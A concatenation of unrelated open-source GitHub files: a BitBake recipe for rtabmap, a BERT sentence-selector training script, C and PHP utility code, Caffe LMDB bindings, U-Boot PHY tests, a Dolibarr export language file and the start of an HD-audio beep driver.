${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
${ROS_UNRESOLVED_PLATFORM_PKG_proj} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
ROS_BUILDTOOL_DEPENDS = " \
cmake-native \
"
ROS_EXPORT_DEPENDS = " \
${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
ROS_BUILDTOOL_EXPORT_DEPENDS = ""
ROS_EXEC_DEPENDS = " \
${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
# Currently informational only -- see http://www.ros.org/reps/rep-0149.html#dependency-tags.
ROS_TEST_DEPENDS = ""
DEPENDS = "${ROS_BUILD_DEPENDS} ${ROS_BUILDTOOL_DEPENDS}"
# Bitbake doesn't support the "export" concept, so build them as if we needed them to build this package (even though we actually
# don't) so that they're guaranteed to have been staged should this package appear in another's DEPENDS.
DEPENDS += "${ROS_EXPORT_DEPENDS} ${ROS_BUILDTOOL_EXPORT_DEPENDS}"
RDEPENDS_${PN} += "${ROS_EXEC_DEPENDS}"
# matches with: https://github.com/introlab/rtabmap-release/archive/release/melodic/rtabmap/0.20.0-2.tar.gz
ROS_BRANCH ?= "branch=release/melodic/rtabmap"
SRC_URI = "git://github.com/introlab/rtabmap-release;${ROS_BRANCH};protocol=https"
SRCREV = "b1d90d0a3889d11ab9b75a88bff2514e2b1b5fb9"
S = "${WORKDIR}/git"
ROS_BUILD_TYPE = "cmake"
inherit ros_${ROS_BUILD_TYPE}
| {
"pile_set_name": "Github"
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler
from torch.utils.data.distributed import DistributedSampler
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
from pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
try:
from sequential_sentence_selector.modeling_sequential_sentence_selector import BertForSequentialSentenceSelector
except:
from modeling_sequential_sentence_selector import BertForSequentialSentenceSelector
import json
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, q, a, t, c, sf):
self.guid = guid
self.question = q
self.answer = a
self.titles = t
self.context = c
self.supporting_facts = sf
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_masks, segment_ids, target_ids, output_masks, num_sents, num_sfs, ex_index):
self.input_ids = input_ids
self.input_masks = input_masks
self.segment_ids = segment_ids
self.target_ids = target_ids
self.output_masks = output_masks
self.num_sents = num_sents
self.num_sfs = num_sfs
self.ex_index = ex_index
class DataProcessor:
def get_train_examples(self, file_name):
return self.create_examples(json.load(open(file_name, 'r')))
def create_examples(self, jsn):
examples = []
max_sent_num = 0
for data in jsn:
guid = data['q_id']
question = data['question']
titles = data['titles']
context = data['context'] # {title: [s1, s2, ...]}
# {title: [index1, index2, ...]}
supporting_facts = data['supporting_facts']
max_sent_num = max(max_sent_num, sum(
[len(context[title]) for title in context]))
examples.append(InputExample(
guid, question, data['answer'], titles, context, supporting_facts))
return examples
def convert_examples_to_features(examples, max_seq_length, max_sent_num, max_sf_num, tokenizer, train=False):
"""Loads a data file into a list of `InputBatch`s."""
DUMMY = [0] * max_seq_length
DUMMY_ = [0.0] * max_sent_num
features = []
logger.info('#### Constructing features... ####')
for (ex_index, example) in enumerate(tqdm(examples, desc='Example')):
tokens_q = tokenizer.tokenize(
'Q: {} A: {}'.format(example.question, example.answer))
tokens_q = ['[CLS]'] + tokens_q + ['[SEP]']
input_ids = []
input_masks = []
segment_ids = []
for title in example.titles:
sents = example.context[title]
for (i, s) in enumerate(sents):
if len(input_ids) == max_sent_num:
break
tokens_s = tokenizer.tokenize(
s)[:max_seq_length-len(tokens_q)-1]
tokens_s = tokens_s + ['[SEP]']
padding = [0] * (max_seq_length -
len(tokens_s) - len(tokens_q))
input_ids_ = tokenizer.convert_tokens_to_ids(
tokens_q + tokens_s)
input_masks_ = [1] * len(input_ids_)
segment_ids_ = [0] * len(tokens_q) + [1] * len(tokens_s)
input_ids_ += padding
input_ids.append(input_ids_)
input_masks_ += padding
input_masks.append(input_masks_)
segment_ids_ += padding
segment_ids.append(segment_ids_)
assert len(input_ids_) == max_seq_length
assert len(input_masks_) == max_seq_length
assert len(segment_ids_) == max_seq_length
target_ids = []
target_offset = 0
for title in example.titles:
sfs = example.supporting_facts[title]
for i in sfs:
if i < len(example.context[title]) and i+target_offset < len(input_ids):
target_ids.append(i+target_offset)
else:
logger.warning('')
logger.warning('Invalid annotation: {}'.format(sfs))
logger.warning('Invalid annotation: {}'.format(
example.context[title]))
target_offset += len(example.context[title])
assert len(input_ids) <= max_sent_num
assert len(target_ids) <= max_sf_num
num_sents = len(input_ids)
num_sfs = len(target_ids)
output_masks = [([1.0] * len(input_ids) + [0.0] * (max_sent_num -
len(input_ids) + 1)) for _ in range(max_sent_num + 2)]
if train:
for i in range(len(target_ids)):
for j in range(len(target_ids)):
if i == j:
continue
output_masks[i][target_ids[j]] = 0.0
for i in range(len(output_masks)):
if i >= num_sfs+1:
for j in range(len(output_masks[i])):
output_masks[i][j] = 0.0
else:
for i in range(len(input_ids)):
output_masks[i+1][i] = 0.0
target_ids += [0] * (max_sf_num - len(target_ids))
padding = [DUMMY] * (max_sent_num - len(input_ids))
input_ids += padding
input_masks += padding
segment_ids += padding
features.append(
InputFeatures(input_ids=input_ids,
input_masks=input_masks,
segment_ids=segment_ids,
target_ids=target_ids,
output_masks=output_masks,
num_sents=num_sents,
num_sfs=num_sfs,
ex_index=ex_index))
logger.info('Done!')
return features
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0 - x
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument("--bert_model", default=None, type=str, required=True,
help="Bert pre-trained model selected in the list: bert-base-uncased, "
"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, "
"bert-base-multilingual-cased, bert-base-chinese.")
parser.add_argument("--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--train_file_path",
type=str,
default=None,
required=True,
help="File path to training data")
## Other parameters
parser.add_argument("--max_seq_length",
default=256,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_sent_num",
default=30,
type=int)
parser.add_argument("--max_sf_num",
default=15,
type=int)
parser.add_argument("--do_lower_case",
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size",
default=1,
type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size",
default=5,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam. (def: 5e-5)")
parser.add_argument("--num_train_epochs",
default=5.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
args = parser.parse_args()
cpu = torch.device('cpu')
device = torch.device("cuda" if torch.cuda.is_available()
and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
args.train_batch_size = int(
args.train_batch_size / args.gradient_accumulation_steps)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if os.path.exists(args.output_dir) and os.listdir(args.output_dir):
raise ValueError(
"Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
processor = DataProcessor()
# Prepare model
if args.bert_model != 'bert-large-uncased-whole-word-masking':
tokenizer = BertTokenizer.from_pretrained(
args.bert_model, do_lower_case=args.do_lower_case)
model = BertForSequentialSentenceSelector.from_pretrained(args.bert_model,
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(-1))
else:
model = BertForSequentialSentenceSelector.from_pretrained('bert-large-uncased',
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(-1))
from utils import get_bert_model_from_pytorch_transformers
state_dict, vocab_file = get_bert_model_from_pytorch_transformers(
args.bert_model)
model.bert.load_state_dict(state_dict)
tokenizer = BertTokenizer.from_pretrained(
vocab_file, do_lower_case=args.do_lower_case)
logger.info(
'The {} model is successfully loaded!'.format(args.bert_model))
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
global_step = 0
nb_tr_steps = 0
tr_loss = 0
POSITIVE = 1.0
NEGATIVE = 0.0
# Load training examples
train_examples = None
num_train_steps = None
train_examples = processor.get_train_examples(args.train_file_path)
train_features = convert_examples_to_features(
train_examples, args.max_seq_length, args.max_sent_num, args.max_sf_num, tokenizer, train=True)
num_train_steps = int(
len(train_features) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)
# Prepare optimizer
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(
nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(
nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
t_total = num_train_steps
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total,
max_grad_norm=1.0)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_features))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids = torch.tensor(
[f.input_ids for f in train_features], dtype=torch.long)
all_input_masks = torch.tensor(
[f.input_masks for f in train_features], dtype=torch.long)
all_segment_ids = torch.tensor(
[f.segment_ids for f in train_features], dtype=torch.long)
all_target_ids = torch.tensor(
[f.target_ids for f in train_features], dtype=torch.long)
all_output_masks = torch.tensor(
[f.output_masks for f in train_features], dtype=torch.float)
all_num_sents = torch.tensor(
[f.num_sents for f in train_features], dtype=torch.long)
all_num_sfs = torch.tensor(
[f.num_sfs for f in train_features], dtype=torch.long)
train_data = TensorDataset(all_input_ids,
all_input_masks,
all_segment_ids,
all_target_ids,
all_output_masks,
all_num_sents,
all_num_sfs)
train_sampler = RandomSampler(train_data)
train_dataloader = DataLoader(
train_data, sampler=train_sampler, batch_size=args.train_batch_size)
model.train()
epc = 0
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
input_masks = batch[1]
batch_max_len = input_masks.sum(dim=2).max().item()
target_ids = batch[3]
num_sents = batch[5]
batch_max_sent_num = num_sents.max().item()
num_sfs = batch[6]
batch_max_sf_num = num_sfs.max().item()
output_masks_cpu = (batch[4])[
:, :batch_max_sf_num+1, :batch_max_sent_num+1]
batch = tuple(t.to(device) for t in batch)
input_ids, input_masks, segment_ids, _, output_masks, __, ___ = batch
B = input_ids.size(0)
input_ids = input_ids[:, :batch_max_sent_num, :batch_max_len]
input_masks = input_masks[:, :batch_max_sent_num, :batch_max_len]
segment_ids = segment_ids[:, :batch_max_sent_num, :batch_max_len]
target_ids = target_ids[:, :batch_max_sf_num]
# 1 for EOE
output_masks = output_masks[:,
:batch_max_sf_num+1, :batch_max_sent_num+1]
target = torch.FloatTensor(output_masks.size()).fill_(
NEGATIVE) # (B, NUM_STEPS, |S|+1) <- 1 for EOE
for i in range(B):
output_masks[i, :num_sfs[i]+1, -1] = 1.0 # for EOE
target[i, num_sfs[i], -1].fill_(POSITIVE)
for j in range(num_sfs[i].item()):
target[i, j, target_ids[i, j]].fill_(POSITIVE)
target = target.to(device)
loss = model(input_ids, segment_ids, input_masks,
output_masks, target, target_ids, batch_max_sf_num)
if n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu.
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
loss.backward()
tr_loss += loss.item()
nb_tr_examples += B
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * \
warmup_linear(global_step/t_total, args.warmup_proportion)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
model_to_save = model.module if hasattr(
model, 'module') else model # Only save the model it-self
output_model_file = os.path.join(
args.output_dir, "pytorch_model_"+str(epc+1)+".bin")
torch.save(model_to_save.state_dict(), output_model_file)
epc += 1
if __name__ == "__main__":
main()
| {
"pile_set_name": "Github"
} |
#ifndef _CONTROLS_H__
#define _CONTROLS_H__ 1
void controls_show(Evas_Object *win, Evas_Object *base, Evas_Object *bg,
Evas_Object *term,
void (*donecb) (void *data), void *donedata);
void controls_init(void);
void controls_shutdown(void);
#endif
| {
"pile_set_name": "Github"
} |
<?php
/**
* User: shenzhe
* Date: 2014/2/7
*
* 内置route
*/
namespace ZPHP\Socket\Route;
use ZPHP\Protocol;
use ZPHP\Core;
class ZRpack
{
public function run($data, $fd)
{
$server = Protocol\Factory::getInstance('ZRpack');
$server->setFd($fd);
$result = array();
if (false === $server->parse($data)) {
return $result;
}
$result[] = Core\Route::route($server);
while ($server->parse("")) {
$result[] = Core\Route::route($server);
}
return $result;
}
}
| {
"pile_set_name": "Github"
} |
#ifdef USE_LMDB
#include "caffe/util/db_lmdb.hpp"
#include <sys/stat.h>
#include <string>
namespace caffe { namespace db {
void LMDB::Open(const string& source, Mode mode) {
MDB_CHECK(mdb_env_create(&mdb_env_));
if (mode == NEW) {
CHECK_EQ(mkdir(source.c_str(), 0744), 0) << "mkdir " << source << " failed";
}
int flags = 0;
if (mode == READ) {
flags = MDB_RDONLY | MDB_NOTLS;
}
int rc = mdb_env_open(mdb_env_, source.c_str(), flags, 0664);
#ifndef ALLOW_LMDB_NOLOCK
MDB_CHECK(rc);
#else
if (rc == EACCES) {
LOG(WARNING) << "Permission denied. Trying with MDB_NOLOCK ...";
// Close and re-open environment handle
mdb_env_close(mdb_env_);
MDB_CHECK(mdb_env_create(&mdb_env_));
// Try again with MDB_NOLOCK
flags |= MDB_NOLOCK;
MDB_CHECK(mdb_env_open(mdb_env_, source.c_str(), flags, 0664));
} else {
MDB_CHECK(rc);
}
#endif
LOG(INFO) << "Opened lmdb " << source;
}
LMDBCursor* LMDB::NewCursor() {
MDB_txn* mdb_txn;
MDB_cursor* mdb_cursor;
MDB_CHECK(mdb_txn_begin(mdb_env_, NULL, MDB_RDONLY, &mdb_txn));
MDB_CHECK(mdb_dbi_open(mdb_txn, NULL, 0, &mdb_dbi_));
MDB_CHECK(mdb_cursor_open(mdb_txn, mdb_dbi_, &mdb_cursor));
return new LMDBCursor(mdb_txn, mdb_cursor);
}
LMDBTransaction* LMDB::NewTransaction() {
return new LMDBTransaction(mdb_env_);
}
void LMDBTransaction::Put(const string& key, const string& value) {
keys.push_back(key);
values.push_back(value);
}
void LMDBTransaction::Commit() {
MDB_dbi mdb_dbi;
MDB_val mdb_key, mdb_data;
MDB_txn *mdb_txn;
// Initialize MDB variables
MDB_CHECK(mdb_txn_begin(mdb_env_, NULL, 0, &mdb_txn));
MDB_CHECK(mdb_dbi_open(mdb_txn, NULL, 0, &mdb_dbi));
bool out_of_memory = false;
for (int i = 0; i < keys.size(); i++) {
mdb_key.mv_size = keys[i].size();
mdb_key.mv_data = const_cast<char*>(keys[i].data());
mdb_data.mv_size = values[i].size();
mdb_data.mv_data = const_cast<char*>(values[i].data());
int put_rc = mdb_put(mdb_txn, mdb_dbi, &mdb_key, &mdb_data, 0);
if (put_rc == MDB_MAP_FULL) {
out_of_memory = true;
break;
} else {
// Failed for some other reason
MDB_CHECK(put_rc);
}
}
if (!out_of_memory) {
// Commit the transaction
MDB_CHECK(mdb_txn_commit(mdb_txn));
mdb_dbi_close(mdb_env_, mdb_dbi);
keys.clear();
values.clear();
} else {
// Double the map size and retry
mdb_txn_abort(mdb_txn);
mdb_dbi_close(mdb_env_, mdb_dbi);
DoubleMapSize();
Commit();
}
}
void LMDBTransaction::DoubleMapSize() {
struct MDB_envinfo current_info;
MDB_CHECK(mdb_env_info(mdb_env_, ¤t_info));
size_t new_size = current_info.me_mapsize * 2;
DLOG(INFO) << "Doubling LMDB map size to " << (new_size>>20) << "MB ...";
MDB_CHECK(mdb_env_set_mapsize(mdb_env_, new_size));
}
} // namespace db
} // namespace caffe
#endif // USE_LMDB
| {
"pile_set_name": "Github"
} |
package com.my.blog.website.dto;
import com.my.blog.website.modal.Vo.MetaVo;
public class MetaDto extends MetaVo {
private int count;
public int getCount() {
return count;
}
public void setCount(int count) {
this.count = count;
}
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/
* Written by Jean-Jacques Hiblot <[email protected]>
*/
#include <common.h>
#include <dm.h>
#include <generic-phy.h>
#include <dm/test.h>
#include <test/ut.h>
/* Base test of the phy uclass */
static int dm_test_phy_base(struct unit_test_state *uts)
{
struct udevice *dev;
struct phy phy1_method1;
struct phy phy1_method2;
struct phy phy2;
struct phy phy3;
struct udevice *parent;
/* Get the device using the phy device*/
ut_assertok(uclass_get_device_by_name(UCLASS_SIMPLE_BUS,
"gen_phy_user", &parent));
/*
* Get the same phy port in 2 different ways and compare.
*/
ut_assertok(generic_phy_get_by_name(parent, "phy1", &phy1_method1))
ut_assertok(generic_phy_get_by_index(parent, 0, &phy1_method2))
ut_asserteq(phy1_method1.id, phy1_method2.id);
/*
* Get the second phy port. Check that the same phy provider (device)
* provides this 2nd phy port, but that the IDs are different
*/
ut_assertok(generic_phy_get_by_name(parent, "phy2", &phy2))
ut_asserteq_ptr(phy1_method2.dev, phy2.dev);
ut_assert(phy1_method1.id != phy2.id);
/*
* Get the third phy port. Check that the phy provider is different
*/
ut_assertok(generic_phy_get_by_name(parent, "phy3", &phy3))
ut_assert(phy2.dev != phy3.dev);
/* Try to get a non-existing phy */
ut_asserteq(-ENODEV, uclass_get_device(UCLASS_PHY, 3, &dev));
ut_asserteq(-ENODATA, generic_phy_get_by_name(parent,
"phy_not_existing", &phy1_method1));
return 0;
}
DM_TEST(dm_test_phy_base, DM_TESTF_SCAN_PDATA | DM_TESTF_SCAN_FDT);
/* Test of the phy uclass using the sandbox phy driver operations */
static int dm_test_phy_ops(struct unit_test_state *uts)
{
struct phy phy1;
struct phy phy2;
struct phy phy3;
struct udevice *parent;
ut_assertok(uclass_get_device_by_name(UCLASS_SIMPLE_BUS,
"gen_phy_user", &parent));
ut_assertok(generic_phy_get_by_name(parent, "phy1", &phy1));
ut_asserteq(0, phy1.id);
ut_assertok(generic_phy_get_by_name(parent, "phy2", &phy2));
ut_asserteq(1, phy2.id);
ut_assertok(generic_phy_get_by_name(parent, "phy3", &phy3));
ut_asserteq(0, phy3.id);
/* test normal operations */
ut_assertok(generic_phy_init(&phy1));
ut_assertok(generic_phy_power_on(&phy1));
ut_assertok(generic_phy_power_off(&phy1));
/*
* test operations after exit().
* The sandbox phy driver does not allow it.
*/
ut_assertok(generic_phy_exit(&phy1));
ut_assert(generic_phy_power_on(&phy1) != 0);
ut_assert(generic_phy_power_off(&phy1) != 0);
/*
* test normal operations again (after re-init)
*/
ut_assertok(generic_phy_init(&phy1));
ut_assertok(generic_phy_power_on(&phy1));
ut_assertok(generic_phy_power_off(&phy1));
/*
* test calling unimplemented feature.
* The call is expected to succeed
*/
ut_assertok(generic_phy_reset(&phy1));
/* PHY2 has a known problem with power off */
ut_assertok(generic_phy_init(&phy2));
ut_assertok(generic_phy_power_on(&phy2));
ut_asserteq(-EIO, generic_phy_power_off(&phy2));
/* PHY3 has a known problem with power off and power on */
ut_assertok(generic_phy_init(&phy3));
ut_asserteq(-EIO, generic_phy_power_off(&phy3));
ut_asserteq(-EIO, generic_phy_power_off(&phy3));
return 0;
}
DM_TEST(dm_test_phy_ops, DM_TESTF_SCAN_PDATA | DM_TESTF_SCAN_FDT);
| {
"pile_set_name": "Github"
} |
# Dolibarr language file - Source file is en_US - exports
ExportsArea=Exports
ImportArea=Import
NewExport=New Export
NewImport=New Import
ExportableDatas=Exportable dataset
ImportableDatas=Importable dataset
SelectExportDataSet=Choose dataset you want to export...
SelectImportDataSet=Choose dataset you want to import...
SelectExportFields=Choose the fields you want to export, or select a predefined export profile
SelectImportFields=Choose the source file fields you want to import and their target field in database by moving them up and down with anchor %s, or select a predefined import profile:
NotImportedFields=Fields of source file not imported
SaveExportModel=Save your selections as an export profile/template (for reuse).
SaveImportModel=Save this import profile (for reuse) ...
ExportModelName=Export profile name
ExportModelSaved=Export profile saved as <b>%s</b>.
ExportableFields=Exportable fields
ExportedFields=Exported fields
ImportModelName=Import profile name
ImportModelSaved=Import profile saved as <b>%s</b>.
DatasetToExport=Dataset to export
DatasetToImport=Import file into dataset
ChooseFieldsOrdersAndTitle=Choose fields order...
FieldsTitle=Fields title
FieldTitle=Field title
NowClickToGenerateToBuildExportFile=Now, select the file format in the combo box and click on "Generate" to build the export file...
AvailableFormats=Available Formats
LibraryShort=Library
ExportCsvSeparator=Csv caracter separator
ImportCsvSeparator=Csv caracter separator
Step=Step
FormatedImport=Import Assistant
FormatedImportDesc1=This module allows you to update existing data or add new objects into the database from a file without technical knowledge, using an assistant.
FormatedImportDesc2=First step is to choose the kind of data you want to import, then the format of the source file, then the fields you want to import.
FormatedExport=Export Assistant
FormatedExportDesc1=These tools allow the export of personalized data using an assistant, to help you in the process without requiring technical knowledge.
FormatedExportDesc2=First step is to choose a predefined dataset, then which fields you want to export, and in which order.
FormatedExportDesc3=When data to export are selected, you can choose the format of the output file.
Sheet=Sheet
NoImportableData=No importable data (no module with definitions to allow data imports)
FileSuccessfullyBuilt=File generated
SQLUsedForExport=SQL Request used to extract data
LineId=Id of line
LineLabel=Label of line
LineDescription=Description of line
LineUnitPrice=Unit price of line
LineVATRate=VAT Rate of line
LineQty=Quantity for line
LineTotalHT=Amount excl. tax for line
LineTotalTTC=Amount with tax for line
LineTotalVAT=Amount of VAT for line
TypeOfLineServiceOrProduct=Type of line (0=product, 1=service)
FileWithDataToImport=File with data to import
FileToImport=Source file to import
FileMustHaveOneOfFollowingFormat=File to import must have one of following formats
DownloadEmptyExample=Download template file with field content information (* are mandatory fields)
ChooseFormatOfFileToImport=Choose the file format to use as import file format by clicking on the %s icon to select it...
ChooseFileToImport=Upload file then click on the %s icon to select file as source import file...
SourceFileFormat=Source file format
FieldsInSourceFile=Fields in source file
FieldsInTargetDatabase=Target fields in Dolibarr database (bold=mandatory)
Field=Field
NoFields=No fields
MoveField=Move field column number %s
ExampleOfImportFile=Example_of_import_file
SaveImportProfile=Save this import profile
ErrorImportDuplicateProfil=Failed to save this import profile with this name. An existing profile already exists with this name.
TablesTarget=Targeted tables
FieldsTarget=Targeted fields
FieldTarget=Targeted field
FieldSource=Source field
NbOfSourceLines=Number of lines in source file
NowClickToTestTheImport=Check that the file format (field and string delimiters) of your file matches the options shown and that you have omitted the header line, or these will be flagged as errors in the following simulation.<br>Click on the "<b>%s</b>" button to run a check of the file structure/contents and simulate the import process.<br><b>No data will be changed in your database</b>.
RunSimulateImportFile=Run Import Simulation
FieldNeedSource=This field requires data from the source file
SomeMandatoryFieldHaveNoSource=Some mandatory fields have no source from data file
InformationOnSourceFile=Information on source file
InformationOnTargetTables=Information on target fields
SelectAtLeastOneField=Switch at least one source field in the column of fields to export
SelectFormat=Choose this import file format
RunImportFile=Import Data
NowClickToRunTheImport=Check the results of the import simulation. Correct any errors and re-test.<br>When the simulation reports no errors you may proceed to import the data into the database.
DataLoadedWithId=The imported data will have an additional field in each database table with this import id: <b>%s</b>, to allow it to be searchable in the case of investigating a problem related to this import.
ErrorMissingMandatoryValue=Mandatory data is empty in the source file for field <b>%s</b>.
TooMuchErrors=There are still <b>%s</b> other source lines with errors but output has been limited.
TooMuchWarnings=There are still <b>%s</b> other source lines with warnings but output has been limited.
EmptyLine=Empty line (will be discarded)
CorrectErrorBeforeRunningImport=You <b>must</b> correct all errors <b>before</b> running the definitive import.
FileWasImported=File was imported with number <b>%s</b>.
YouCanUseImportIdToFindRecord=You can find all the imported records in your database by filtering on field <b>import_key='%s'</b>.
NbOfLinesOK=Number of lines with no errors and no warnings: <b>%s</b>.
NbOfLinesImported=Number of lines successfully imported: <b>%s</b>.
DataComeFromNoWhere=Value to insert comes from nowhere in source file.
DataComeFromFileFieldNb=Value to insert comes from field number <b>%s</b> in source file.
DataComeFromIdFoundFromRef=Value that comes from field number <b>%s</b> of source file will be used to find the id of the parent object to use (so the object <b>%s</b> that has the ref. from source file must exist in the database).
DataComeFromIdFoundFromCodeId=Code that comes from field number <b>%s</b> of source file will be used to find the id of the parent object to use (so the code from source file must exist in the dictionary <b>%s</b>). Note that if you know the id, you can also use it in the source file instead of the code. Import should work in both cases.
DataIsInsertedInto=Data coming from source file will be inserted into the following field:
DataIDSourceIsInsertedInto=The id of parent object was found using the data in the source file, will be inserted into the following field:
DataCodeIDSourceIsInsertedInto=The id of parent line found from code, will be inserted into following field:
SourceRequired=Data value is mandatory
SourceExample=Example of possible data value
ExampleAnyRefFoundIntoElement=Any ref found for element <b>%s</b>
ExampleAnyCodeOrIdFoundIntoDictionary=Any code (or id) found into dictionary <b>%s</b>
CSVFormatDesc=<b>Comma Separated Value</b> file format (.csv).<br>This is a text file format where fields are separated by a separator [ %s ]. If separator is found inside a field content, field is rounded by round character [ %s ]. Escape character to escape round character is [ %s ].
Excel95FormatDesc=<b>Excel</b> file format (.xls)<br>This is the native Excel 95 format (BIFF5).
Excel2007FormatDesc=<b>Excel</b> file format (.xlsx)<br>This is the native Excel 2007 format (SpreadsheetML).
TsvFormatDesc=<b>Tab Separated Value</b> file format (.tsv)<br>This is a text file format where fields are separated by a tabulator [tab].
ExportFieldAutomaticallyAdded=Field <b>%s</b> was automatically added. It will avoid you to have similar lines to be treated as duplicate record (with this field added, all lines will own their own id and will differ).
CsvOptions=CSV format options
Separator=Field Separator
Enclosure=String Delimiter
SpecialCode=Special code
ExportStringFilter=%% allows replacing one or more characters in the text
ExportDateFilter=YYYY, YYYYMM, YYYYMMDD: filters by one year/month/day<br>YYYY+YYYY, YYYYMM+YYYYMM, YYYYMMDD+YYYYMMDD: filters over a range of years/months/days<br> > YYYY, > YYYYMM, > YYYYMMDD: filters on all following years/months/days<br> < YYYY, < YYYYMM, < YYYYMMDD: filters on all previous years/months/days
ExportNumericFilter=NNNNN filters by one value<br>NNNNN+NNNNN filters over a range of values<br>< NNNNN filters by lower values<br>> NNNNN filters by higher values
ImportFromLine=Import starting from line number
EndAtLineNb=End at line number
ImportFromToLine=Limit range (From - To). Eg. to omit header line(s).
SetThisValueTo2ToExcludeFirstLine=For example, set this value to 3 to exclude the 2 first lines.<br>If the header lines are NOT omitted, this will result in multiple errors in the Import Simulation.
KeepEmptyToGoToEndOfFile=Keep this field empty to process all lines to the end of the file.
SelectPrimaryColumnsForUpdateAttempt=Select column(s) to use as primary key for an UPDATE import
UpdateNotYetSupportedForThisImport=Update is not supported for this type of import (only insert)
NoUpdateAttempt=No update attempt was performed, only insert
ImportDataset_user_1=Users (employees or not) and properties
ComputedField=Computed field
## filters
SelectFilterFields=If you want to filter on some values, just input values here.
FilteredFields=Filtered fields
FilteredFieldsValues=Value for filter
FormatControlRule=Format control rule
## imports updates
KeysToUseForUpdates=Key (column) to use for <b>updating</b> existing data
NbInsert=Number of inserted lines: %s
NbUpdate=Number of updated lines: %s
MultipleRecordFoundWithTheseFilters=Multiple records have been found with these filters: %s
| {
"pile_set_name": "Github"
} |
/*
* Digital Beep Input Interface for HD-audio codec
*
* Author: Matt Ranostay <[email protected]>
* Copyright (c) 2008 Embedded Alley Solutions Inc
*
* This driver is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This driver is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <linux/input.h>
#include <linux/slab.h>
#include <linux/workqueue.h>
#include <linux/export.h>
#include <sound/core.h>
#include "hda_beep.h"
#include "hda_local.h"
enum {
DIGBEEP_HZ_STEP = 46875, /* 46.875 Hz */
DIGBEEP_HZ_MIN = 93750, /* 93.750 Hz */
DIGBEEP_HZ_MAX = 12000000, /* 12 KHz */
};
/* generate or stop tone */
